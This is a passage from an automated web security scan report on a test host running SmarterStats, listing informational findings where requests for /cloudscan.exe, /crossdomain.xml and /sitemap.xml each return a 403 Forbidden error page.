Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:46 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.12. http://vulnerable.smarterstats.6.0.host:9999/cloudscan.exe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /cloudscan.exe

Request

GET /cloudscan.exe HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:46 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.13. http://vulnerable.smarterstats.6.0.host:9999/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /crossdomain.xml

Request

GET /crossdomain.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:50 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.14. http://vulnerable.smarterstats.6.0.host:9999/sitemap.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:13:12 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

Report generated by XSS.CX Research Blog at Tue Oct 12 15:20:59 CDT 2010.